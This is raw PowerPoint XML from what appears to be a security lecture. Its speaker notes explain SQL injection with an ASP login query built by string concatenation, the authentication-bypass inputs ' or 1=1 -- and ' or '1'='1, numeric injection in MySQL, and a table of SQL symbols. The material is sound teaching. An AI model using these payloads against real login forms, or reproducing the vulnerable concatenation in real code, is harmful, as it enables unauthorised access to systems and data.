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2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId98"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId99"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="335" r:id="rId3"/>
    <p:sldId id="557" r:id="rId4"/>
    <p:sldId id="738" r:id="rId5"/>
    <p:sldId id="564" r:id="rId6"/>
    <p:sldId id="566" r:id="rId7"/>
    <p:sldId id="565" r:id="rId8"/>
    <p:sldId id="567" r:id="rId9"/>
    <p:sldId id="568" r:id="rId10"/>
    <p:sldId id="569" r:id="rId11"/>
    <p:sldId id="570" r:id="rId12"/>
    <p:sldId id="571" r:id="rId13"/>
    <p:sldId id="572" r:id="rId14"/>
    <p:sldId id="573" r:id="rId15"/>
    <p:sldId id="574" r:id="rId16"/>
    <p:sldId id="575" r:id="rId17"/>
    <p:sldId id="576" r:id="rId18"/>
    <p:sldId id="578" r:id="rId19"/>
    <p:sldId id="579" r:id="rId20"/>
    <p:sldId id="580" r:id="rId21"/>
    <p:sldId id="581" r:id="rId22"/>
    <p:sldId id="583" r:id="rId23"/>
    <p:sldId id="582" r:id="rId24"/>
    <p:sldId id="585" r:id="rId25"/>
    <p:sldId id="739" r:id="rId26"/>
    <p:sldId id="587" r:id="rId27"/>
    <p:sldId id="588" r:id="rId28"/>
    <p:sldId id="589" r:id="rId29"/>
    <p:sldId id="590" r:id="rId30"/>
    <p:sldId id="591" r:id="rId31"/>
    <p:sldId id="592" r:id="rId32"/>
    <p:sldId id="594" r:id="rId33"/>
    <p:sldId id="595" r:id="rId34"/>
    <p:sldId id="597" r:id="rId35"/>
    <p:sldId id="598" r:id="rId36"/>
    <p:sldId id="620" r:id="rId37"/>
    <p:sldId id="599" r:id="rId38"/>
    <p:sldId id="619" r:id="rId39"/>
    <p:sldId id="616" r:id="rId40"/>
    <p:sldId id="740" r:id="rId41"/>
    <p:sldId id="623" r:id="rId42"/>
    <p:sldId id="624" r:id="rId43"/>
    <p:sldId id="628" r:id="rId44"/>
    <p:sldId id="629" r:id="rId45"/>
    <p:sldId id="630" r:id="rId46"/>
    <p:sldId id="635" r:id="rId47"/>
    <p:sldId id="636" r:id="rId48"/>
    <p:sldId id="639" r:id="rId49"/>
    <p:sldId id="642" r:id="rId50"/>
    <p:sldId id="643" r:id="rId51"/>
    <p:sldId id="646" r:id="rId52"/>
    <p:sldId id="647" r:id="rId53"/>
    <p:sldId id="648" r:id="rId54"/>
    <p:sldId id="650" r:id="rId55"/>
    <p:sldId id="649" r:id="rId56"/>
    <p:sldId id="741" r:id="rId57"/>
    <p:sldId id="690" r:id="rId58"/>
    <p:sldId id="691" r:id="rId59"/>
    <p:sldId id="693" r:id="rId60"/>
    <p:sldId id="694" r:id="rId61"/>
    <p:sldId id="751" r:id="rId62"/>
    <p:sldId id="752" r:id="rId63"/>
    <p:sldId id="753" r:id="rId64"/>
    <p:sldId id="754" r:id="rId65"/>
    <p:sldId id="755" r:id="rId66"/>
    <p:sldId id="756" r:id="rId67"/>
    <p:sldId id="757" r:id="rId68"/>
    <p:sldId id="695" r:id="rId69"/>
    <p:sldId id="696" r:id="rId70"/>
    <p:sldId id="749" r:id="rId71"/>
    <p:sldId id="750" r:id="rId72"/>
    <p:sldId id="764" r:id="rId73"/>
    <p:sldId id="765" r:id="rId74"/>
    <p:sldId id="766" r:id="rId75"/>
    <p:sldId id="767" r:id="rId76"/>
    <p:sldId id="768" r:id="rId77"/>
    <p:sldId id="769" r:id="rId78"/>
    <p:sldId id="759" r:id="rId79"/>
    <p:sldId id="760" r:id="rId80"/>
    <p:sldId id="761" r:id="rId81"/>
    <p:sldId id="762" r:id="rId82"/>
    <p:sldId id="697" r:id="rId83"/>
    <p:sldId id="699" r:id="rId84"/>
    <p:sldId id="744" r:id="rId85"/>
    <p:sldId id="708" r:id="rId86"/>
    <p:sldId id="712" r:id="rId87"/>
    <p:sldId id="713" r:id="rId88"/>
    <p:sldId id="770" r:id="rId89"/>
    <p:sldId id="723" r:id="rId90"/>
    <p:sldId id="725" r:id="rId91"/>
    <p:sldId id="726" r:id="rId92"/>
    <p:sldId id="727" r:id="rId93"/>
    <p:sldId id="728" r:id="rId94"/>
    <p:sldId id="729" r:id="rId95"/>
    <p:sldId id="732" r:id="rId96"/>
    <p:sldId id="735" r:id="rId97"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId100"/>
  </p:custDataLst>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1600"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9933"/>
    <a:srgbClr val="FFFF00"/>
    <a:srgbClr val="CC0000"/>
    <a:srgbClr val="BCFF37"/>
    <a:srgbClr val="339966"/>
    <a:srgbClr val="CC99FF"/>
    <a:srgbClr val="005D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9" autoAdjust="0"/>
    <p:restoredTop sz="83692" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="61" d="100"/>
          <a:sy n="61" d="100"/>
        </p:scale>
        <p:origin x="-1392" y="-84"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="42" y="3071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3" d="100"/>
          <a:sy n="53" d="100"/>
        </p:scale>
        <p:origin x="-184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handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId10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4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pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28467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pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28467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pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28467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pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{6759377C-AEF5-4563-BB58-2A1CAECE4D94}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21844245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pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1259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pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450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259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59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pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1259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pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5174D055-005C-4E50-8D6D-C3501DDB074E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28978645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en.wikipedia.org/wiki/Message_transfer_agent#cite_note-2" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide71.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Client%E2%80%93server"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a-IR" smtClean="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1E1DA11-8690-4337-93C6-0D34EDD92939}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>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Web-based applications constitute the worst threat of SQL injection. In our Pen Tests, over 60% of our clients continue to be vulnerable to SQL Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The main problem with SQL Injection is that the vulnerability is originated when the web application is coded. Most programmers are still not aware of the problem. Tutorials and demo "templates" on the Internet and even some that have been shipped with commercial databases promote building queries by concatenating strings, which is the main source for SQL Injection vulnerabilities. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Additionally, a lot of the proposed solutions on the web continue to be flawed.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1365F6B-30BF-4BA8-B3E3-089A7E875290}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30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common way of validating users in an application is to by checking if the user and password combination exists in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> table. The following query will bring back one record if there is one row where the login = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kEnBy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>' and the password = '123':</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM users WHERE login = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kEnBy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AND password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To code this, a common practice among developers is to concatenate a string with the SQL command and then execute it to see if it returns something different to null. An Active Server Page code where the SQL statement gets concatenated might look like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM users WHERE login = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>formusr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> AND password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>formpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>";</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1365F6B-30BF-4BA8-B3E3-089A7E875290}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31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SQL Injection occurs when an attacker is able to insert a series of SQL statements into a 'query' by manipulating data input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If an attacker inserts: ' or 1=1 --  into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>formusr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> field he will change the normal execution of the query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By inserting a single quote the username string is closed and the final concatenated string would end up interpreting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>or 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>as part of the command. The -- (double dash) is used to comment everything after the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and avoid a wrong syntax error. This could also have been achieved by inserting the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>' or '1'='1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By injecting any of the two commands discussed, an attacker would get logged in as the first user in the table. This happens because the WHERE clause ends up validating that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> ' ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(nothing) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>OR 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>OR '1'='1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in the second statement) The first conditional is False but the second one is True. By using OR the whole condition is True and therefore all rows from table users are returned. All rows is not null therefore the log in condition is met.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{21365F6B-30BF-4BA8-B3E3-089A7E875290}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32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 a similar syntax a numeric login would not use single quotes because in SQL you only need quotes for strings.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This PHP / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code example concatenates a query that uses no single quotes as part of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syntaxis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{21365F6B-30BF-4BA8-B3E3-089A7E875290}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33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Injecting into a numeric field is very similar. The main difference with string injection is that in numeric injection the first number is taken as the complete parameter (no need to close it with a single quote) and all the text after that number will be considered as part of the command. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In this case the # (number sign) is used instead of the -- (double dash) because we are injecting into a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{21365F6B-30BF-4BA8-B3E3-089A7E875290}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>34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Symbol Usage in SQL99 complaint DBs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+ Addition operator; also concatenation operator; when used in an URL it becomes a white space)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>|| Concatenation operator in Oracle and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Postgres</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- Subtraction operator; also a range indicator in CHECK constraints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>= Equality operator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;&gt; != Inequality operators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;&lt; Greater-than and Less-than operators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( ) Expression or hierarchy delimiter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>% Wildcard attribute indicator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>List item separator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>@, @@ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local and Global variable indicators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Identifier qualifier separator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘’ “” Character string indicators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“” Quoted identifier indicators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Single-line comment delimiter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Single-line comment delimiter in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
